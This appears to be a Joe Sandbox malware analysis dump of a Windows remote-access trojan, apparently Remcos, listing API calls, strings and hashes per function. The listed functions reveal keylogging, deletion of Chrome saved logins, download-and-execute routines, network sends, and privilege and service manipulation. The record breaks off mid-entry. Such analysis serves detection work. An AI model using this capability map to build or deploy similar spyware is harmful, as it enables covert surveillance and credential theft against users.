                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: File$Find$CreateFirstNext
                        • String ID: 8SG$PXG$PXG$NG$PG
                        • API String ID: 341183262-3812160132
                        • Opcode ID: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                        APIs
                        • GetForegroundWindow.USER32 ref: 0040A416
                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                        • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                        • GetKeyState.USER32(00000010), ref: 0040A433
                        • GetKeyboardState.USER32(?), ref: 0040A43E
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                        • String ID:
                        • API String ID: 1888522110-0
                        • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                        APIs
                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: AddressCloseCreateLibraryLoadProcsend
                        • String ID: SHDeleteKeyW$Shlwapi.dll
                        • API String ID: 2127411465-314212984
                        • Opcode ID: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                        APIs
                        • _free.LIBCMT ref: 00449212
                        • _free.LIBCMT ref: 00449236
                        • _free.LIBCMT ref: 004493BD
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                        • _free.LIBCMT ref: 00449589
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                        • String ID:
                        • API String ID: 314583886-0
                        • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                        APIs
                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                        • String ID: !D@$PowrProf.dll$SetSuspendState
                        • API String ID: 1589313981-2876530381
                        • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: InfoLocale
                        • String ID: ACP$OCP$['E
                        • API String ID: 2299586839-2532616801
                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                        APIs
                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                        Strings
                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleOpen$FileRead
                        • String ID: http://geoplugin.net/json.gp
                        • API String ID: 3121278467-91888290
                        • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                        • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                        • GetLastError.KERNEL32 ref: 0040BA58
                        Strings
                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                        • UserProfile, xrefs: 0040BA1E
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • API String ID: 2018770650-1062637481
                        • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                        • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                        • GetLastError.KERNEL32 ref: 0041799D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3534403312-3733053543
                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                        APIs
                        • __EH_prolog.LIBCMT ref: 00409258
                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                        • FindClose.KERNEL32(00000000), ref: 004093C1
                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                          • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                        • FindClose.KERNEL32(00000000), ref: 004095B9
                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                        • String ID:
                        • API String ID: 2435342581-0
                        • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                        • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ManagerStart
                        • String ID:
                        • API String ID: 276877138-0
                        • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                        • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                        • _wcschr.LIBVCRUNTIME ref: 00451E4A
                        • _wcschr.LIBVCRUNTIME ref: 00451E58
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                        • String ID: sJD
                        • API String ID: 4212172061-3536923933
                        • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                        • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                        • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                        • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                        APIs
                          • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                          • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                          • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                        • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                        • ExitProcess.KERNEL32 ref: 0040F8CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseExitOpenProcessQuerySleepValue
                        • String ID: 5.0.0 Pro$override$pth_unenc
                        • API String ID: 2281282204-3992771774
                        • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                        • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                        APIs
                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                        • wsprintfW.USER32 ref: 0040B1F3
                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: EventLocalTimewsprintf
                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                        • API String ID: 1497725170-248792730
                        • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                        • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                        • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                        • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                        APIs
                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$FindLoadLockSizeof
                        • String ID: SETTINGS
                        • API String ID: 3473537107-594951305
                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                        APIs
                        • __EH_prolog.LIBCMT ref: 0040966A
                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstH_prologNext
                        • String ID:
                        • API String ID: 1157919129-0
                        • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                        • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                        • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                        • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                        APIs
                        • __EH_prolog.LIBCMT ref: 00408811
                        • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                        • String ID:
                        • API String ID: 1771804793-0
                        • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                        • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                        • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                        • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DownloadExecuteFileShell
                        • String ID: C:\Users\user\AppData\Roaming\jdSldfVS.exe$open
                        • API String ID: 2825088817-2630512652
                        • Opcode ID: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                        • Opcode Fuzzy Hash: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstNextsend
                        • String ID: XPG$XPG
                        • API String ID: 4113138495-1962359302
                        • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                        • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                        APIs
                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                          • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                          • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateInfoParametersSystemValue
                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                        • API String ID: 4127273184-3576401099
                        • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                        • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: PkGNG
                        • API String ID: 0-263838557
                        • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                        • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                        • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                        • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorInfoLastLocale$_free$_abort
                        • String ID:
                        • API String ID: 2829624132-0
                        • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                        • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                        • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                        • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
